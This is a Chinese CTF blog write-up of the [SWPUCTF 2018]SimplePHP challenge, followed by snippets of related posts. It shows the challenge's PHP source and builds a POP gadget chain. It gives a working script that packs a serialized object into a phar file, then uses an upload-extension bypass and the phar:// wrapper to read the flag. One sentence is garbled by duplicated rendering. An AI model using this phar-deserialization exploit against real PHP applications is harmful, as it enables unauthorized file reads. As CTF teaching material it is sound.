[SWPUCTF 2018]SimplePHP

最新推荐文章于 2023-11-08 21:19:12 发布
最新推荐文章于 2023-11-08 21:19:12 发布
阅读量183 收藏
点赞数
文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61839115/article/details/129736918
版权

文章目录

[SWPUCTF 2018]SimplePHP

首先打开主页,发现有几个功能:

image-20230323150613411

有一个查看文件,和一个上传文件。

在查看文件中可以进行文件包含,读取出相关的php代码内容

我们通过读取file.php,一步一步读取出了6个php文件,由于有3个没用,所以我只放了三个文件出来

源代码

class.php

 <?php
class C1e4r
{
    public $test;
    public $str;
    public function __construct($name)
    {
        $this->str = $name;
    }
    public function __destruct()
    {
        $this->test = $this->str;
        echo $this->test;
    }
}

class Show
{
    public $source;
    public $str;
    public function __construct($file)
    {
        $this->source = $file;   //$this->source = phar://phar.jpg
        echo $this->source;
    }
    public function __toString()
    {
        $content = $this->str['str']->source;
        return $content;
    }
    public function __set($key,$value)
    {
        $this->$key = $value;
    }
    public function _show()
    {
        if(preg_match('/http|https|file:|gopher|dict|\.\.|f1ag/i',$this->source)) {
            die('hacker!');
        } else {
            highlight_file($this->source);
        }
        
    }
    public function __wakeup()
    {
        if(preg_match("/http|https|file:|gopher|dict|\.\./i", $this->source)) {
            echo "hacker~";
            $this->source = "index.php";
        }
    }
}
class Test
{
    public $file;
    public $params;
    public function __construct()
    {
        $this->params = array();
    }
    public function __get($key)
    {
        return $this->get($key);
    }
    public function get($key)
    {
        if(isset($this->params[$key])) {
            $value = $this->params[$key];
        } else {
            $value = "index.php";
        }
        return $this->file_get($value);
    }
    public function file_get($value)
    {
        $text = base64_encode(file_get_contents($value));
        return $text;
    }
}
?>

file.php

<?php 
header("content-type:text/html;charset=utf-8");  
include 'function.php'; 
include 'class.php'; 
ini_set('open_basedir','/var/www/html/'); 
$file = $_GET["file"] ? $_GET['file'] : ""; 
if(empty($file)) { 
    echo "<h2>There is no file to show!<h2/>"; 
} 
$show = new Show(); 
if(file_exists($file)) { 
    $show->source = $file; 
    $show->_show(); 
} else if (!empty($file)){ 
    die('file doesn\'t exists.'); 
} 
?>

function.php

<?php 
//show_source(__FILE__); 
include "base.php"; 
header("Content-type: text/html;charset=utf-8"); 
error_reporting(0); 
function upload_file_do() { 
    global $_FILES; 
    $filename = md5($_FILES["file"]["name"].$_SERVER["REMOTE_ADDR"]).".jpg"; 
    //mkdir("upload",0777); 
    if(file_exists("upload/" . $filename)) { 
        unlink($filename); 
    } 
    move_uploaded_file($_FILES["file"]["tmp_name"],"upload/" . $filename); 
    echo '<script type="text/javascript">alert("上传成功!");</script>'; 
} 
function upload_file() { 
    global $_FILES; 
    if(upload_file_check()) { 
        upload_file_do(); 
    } 
} 
function upload_file_check() { 
    global $_FILES; 
    $allowed_types = array("gif","jpeg","jpg","png"); 
    $temp = explode(".",$_FILES["file"]["name"]); 
    $extension = end($temp); 
    if(empty($extension)) { 
        //echo "<h4>请选择上传的文件:" . "<h4/>"; 
    } 
    else{ 
        if(in_array($extension,$allowed_types)) { 
            return true; 
        } 
        else { 
            echo '<script type="text/javascript">alert("Invalid file!");</script>'; 
            return false; 
        } 
    } 
} 
?>

分析

仔细分析代码,发现只用这里能够读取到flag:

Test类

public function file_get($value)
{
    $text = base64_encode(file_get_contents($value));
    return $text;
}

我们仔细分析一下Test类:

class Test
{
    public $file;
    public $params;
    public function __construct()
    {
        $this->params = array();
    }
    public function __get($key)
    {
        return $this->get($key);
    }
    public function get($key)
    {
        if(isset($this->params[$key])) {
            $value = $this->params[$key];
        } else {
            $value = "index.php";
        }
        return $this->file_get($value);
    }
    public function file_get($value)
    {
        $text = base64_encode(file_get_contents($value));
        return $text;
    }
}

我们发现有这样一条链:__get($key)=>get($key)=>file_get($value)

我们可以通过调用 __get($key)方法,逐步传参,然后获得 v a l u e 使用 f i l e g e t c o n t e n t s ( ) 函数取出 f l a g 。但是我们想要让 ‘ value使用file_get_contents()函数取出flag。但是我们想要让 ` value使用filegetcontents()函数取出flag。但是我们想要让value=“/var/www/html/f1ag.php”`

需要让变量 p a r a m s 变为一个数组,我们先假设数组为: ‘ params变为一个数组,我们先假设数组为:` params变为一个数组,我们先假设数组为:params=array(‘source’=>‘/var/www/html/f1ag.php’)`

但是我们如何才能调用 __get()方法呢,这是一个魔术方法,当我们访问通过该类对象调用一个不存在的属性时,就会自动调用该方法。

我们接下来观察一下Show类:

class Show
{
    public $source;
    public $str;
    public function __construct($file)
    {
        $this->source = $file;   //$this->source = phar://phar.jpg
        echo $this->source;
    }
    public function __toString()
    {
        $content = $this->str['str']->source;
        return $content;
    }
}

我们观察一下 __toString()方法,我们发现:

$content = $this->str['str']->source;

并且在方法__construct()中提示我们使用phar://伪协议

所以,此处我们应该让 $this->str['str']设为Test对象,这样的话,Test对象就会调用一个不存在的属性:source,就会调用Test类魔术方法__get(),从而获得flag

但是怎样才能让Show对象调用__toString()方法?

我们观察一下C1e4r这个类:

class C1e4r
{
    public $test;
    public $str;
    public function __construct($name)
    {
        $this->str = $name;
    }
    public function __destruct()
    {
        $this->test = $this->str;
        echo $this->test;
    }
}

如果我们设置 $str变量为Show类对象,这样就可以调用Show类对象的__toString()方法了

通过以上分析,我们可以写如下代码构造:

<?php

class C1e4r {
    public $test;
    public $str;
}

class Show {
    public $source;
    public $str;
}

class Test {
    public $file;
    public $params = array('source'=>'/var/www/html/f1ag.php');
}

$c = new C1e4r();
$s = new Show();
$t = new Test();
$s->str['str'] = $t;
$c->str=$s;
echo serialize($c);
$phar = new Phar('exp.phar');
$phar->startBuffering();
$phar->setStub('<?php __HALT_COMPILER(); ?>');
$phar->setMetadata($c);
$phar->addFromString("test.txt","test");
$phar->stopBuffering();

生成phar文件:exp.phar

根据文件上传检查函数:

function upload_file_check() {
    global $_FILES;
    $allowed_types = array("gif","jpeg","jpg","png");
    $temp = explode(".",$_FILES["file"]["name"]);
    $extension = end($temp);
    if(empty($extension)) {
        //echo "<h4>请选择上传的文件:" . "<h4/>";
    }
    else{
        if(in_array($extension,$allowed_types)) {
            return true;
        }
        else {
            echo '<script type="text/javascript">alert("Invalid file!");</script>';
            return false;
        }
    }
}

我们可以将文件后缀改为: jpg进行绕过

上传之后会进行重命名:

function upload_file_do() {
    global $_FILES;
    $filename = md5($_FILES["file"]["name"].$_SERVER["REMOTE_ADDR"]).".jpg";
    //mkdir("upload",0777);
    if(file_exists("upload/" . $filename)) {
        unlink($filename);
    }
    move_uploaded_file($_FILES["file"]["tmp_name"],"upload/" . $filename);
    echo '<script type="text/javascript">alert("上传成功!");</script>';
}

文件名重新编码,通过文件名+ip地址进行md5编码,

我们可以访问 /upload 获取上传文件名:

image-20230323163624046

我们观察一下:file.php

<?php
header("content-type:text/html;charset=utf-8");
include 'function.php';
include 'class.php';
ini_set('open_basedir','/var/www/html/');
$file = $_GET["file"] ? $_GET['file'] : "";
if(empty($file)) {
    echo "<h2>There is no file to show!<h2/>";
}
$show = new Show();
if(file_exists($file)) {
    $show->source = $file;
    $show->_show();
} else if (!empty($file)){
    die('file doesn\'t exists.');
}
?>

这里我们注意到了 file_exists()函数,配合phar://伪协议和phar文件可以实现反序列化,然后输出 flag的base64编码

我们直接使用:

phar://upload/文件名

image-20230323163930699

解密获得flag

Leekos
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【网络安全 | CTF】攻防世界 simple_php 解题详析
等风来
05-21 5123
恒等比较运算符是一个严格比较,它不仅比较变量的值,还比较变量的数据类型和内存地址。当使用恒等比较运算符比较两个变量时,如果它们的值和数据类型都相等,则返回 true。比较运算符是一个松散比较,它只比较变量的值,而不考虑变量的数据类型。当比较两个变量时,如果它们的值相等,则返回 true。5.对于两个操作数都是字符串的情况,PHP会将两个字符串中的非数字字符删除,然后将剩余的数字字符串转换为相应的数字进行比较。如果变量b的值大于1234,则输出变量flag2的值。如果变量b是一个数字,则终止程序的执行。
BUUCTF [SWPUCTF 2018]SimplePHP
weixin_45441024的博客
12-01 1171
BUUCTF [SWPUCTF 2018]SimplePHP 打开题目我们很明显的看到了上传文件的板块和查看文件的板块,选择这个上传文件,显示如图 我们再选择查看文件的板块,url如图所示 我们在’='后面输入我们想要查看的文件,发现直接就给打印出来了,之后我们根据这个查看了几个php文件,得到了如下内容: file.php: <?php header("content-type:text/html;charset=utf-8"); include 'function.php'; inc
攻防世界之simple_php(web简单)
my_name_is_sy的博客
05-26 2803
这一题考的是php语言中“==”的知识点,它仅仅表示数值想等。
攻防世界--simple php,easy php
m0_67467924的博客
04-20 920
第一个if判断语句,使用isset判断变量a是否申明,使用intval获取变量的整数值,并判断其值大于6000000,使用strlen函数判断变量a的长度,且长度小于等于3.若三个同时满足,那么进行二次判断,若变量b也有声明,同时他的值在使用md5加密后使用substr函数获取加密后的6位,且这6位的值为8b84b,如果满足就给key变量赋值为1;最后我们来绕过c,首先c是一个数组,且数组中存在m键,因为m不能为数值型,但又要大于2022,于是我们选择构造5555ab这个字符来绕过。进入环境,代码审计,
simplePHP轻量级
01-21
尽管simplePHP可能没有内置完整的ORM系统,但开发者可以通过自定义或集成第三方库实现数据库操作的面向对象化。ORM允许开发者使用面向对象的方式来处理数据库操作,提高了代码的可读性和可维护性。 ### 5. 错误处理...
simplePHP Scripts-开源
05-01
simplePHP Scripts通过使用文本文件,实现了轻量级的数据存储,同时也保留了基本的数据操作功能,如增删改查。 **.dat和.txt文件的使用** `.dat`和`.txt`文件通常用于存储结构化或非结构化的文本数据。在simplePHP...
simplephp:使一切变得简单
02-14
以上是对"SimplePHP"的一些基本理解和可能特性,具体的功能和使用方式还需要查看压缩包中的"simplephp-main"文件来获取详细信息。这个文件可能是框架的主入口文件,包含了启动和配置SimplePHP的代码,或者是整个项目...
simplePHP-curl:源自 Codeigniter-cURL 的 Simpe PHP cURL 库
06-13
您可以使用更好、经过充分测试和开发的 cURL 库。...简单调用这些都在一行代码中完成,让生活变得轻松。 他们返回页面的正文,或者在失败时返回 FALSE。...// Simple call to CI URI$curl->simple_post('controller/method...
java企业oa源码-SimplePHP:简洁明了PHP框架,全面支持php5.3+
06-05
当前状态: 这是一个简单明了的框架,专为 ...设计,具有完整的 OOP 支持。 ... 但是几乎所有的 ...兼容,所以我不能使用命名空间来管理类(实际上命名空间在这些框架中没有用)。...因此,我决定编写一个新框架来满足我的需求。...
攻防世界-simple_php
HEAVEN569的博客
03-14 752
题目描述:小宁听说php是最好的语言,于是她简单学习之后写了几行php代码。 题目虽然是不难,我们做题的目的是为了总结知识点。下面的php弱类型比较的知识点都是多位大佬总结的,真香。 php有两种比较的符号 == 与=== === :在进行比较的时候,会判断两种字符串的类型是否相等,再比较。 == :在进行比较的时候,会先将字符串类型转成相同,在进行比较 ==如果比较一个数字和字符串,或者比较涉及到数字内容的字符串,则字符串会被转换成数值,并且比较的方式会按照数值进行。 代码示例...
simple_php(攻防世界)
最新发布
2301_80548709的博客
11-08 500
4.其次,对于$b有一个判定的函数is_numeric(),即如果$b为纯数字就会退出程序,同时满足$b>1234,所以我们可以来一个字符串$b=4567abc(在> <符号比较时,数字与字符串比较,会先将字符串转化为数字在比较)这时候这需要引入新的知识:(1)$a输入布尔值true,非空数组,非空字符串,非零数字则可使$a判断为真;(2)当逻辑运算符“==”进行判断时,左边的若为字符串(第一个字符不为数字)=空值,且不能为数字,同时满足==左边转化后为0。我们需要输入a,b的值。
[SWPUCTF 2018]SimplePHP 一道phar反序列化和pop链的题目
weixin_73560599的博客
08-02 153
此题考查pop链 phar反序列化 知道phar反序列化的概念,怎么生成phar文件以及受影响的函数和pop链的构造即可
[SWPUCTF 2018]SimplePHP_wp
lzu_lfl的博客
11-11 265
pop链,phar反序列化
[SWPU 2018]SimplePHP
m0_70819573的博客
04-04 117
而在upload_file.php中,include了class.php,在class.php中有危险函数file_get_content,构造pop链C1e4r->destruct=>Show->__toString=>Test->__get->file_get(),其中__get在类被[]引用时会触发,且$key=source。在查看文件区域发现?file=结果有文件任意读取的漏洞,可以获取相关文件源码。改名上传后用phar://伪协议读取flag。提示flag在f1ag.php里。
[SWPUCTF 2018]SimplePHP--一道简单的Phar反序列化题目
Dream'
06-16 956
题目就不贴了,直接给出利用链①:echo会触发__toString魔术方法,所以这里的$this->test应该是Show类实例化的对象show②:这里应该使$this->str['str']为Test类实例化后的对象test,然后test->source会触发__get魔术方法(因为Test类没有名为source的成员变量,所以会触发get魔术方法,并且$key=source)③④:调用get方法,$...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值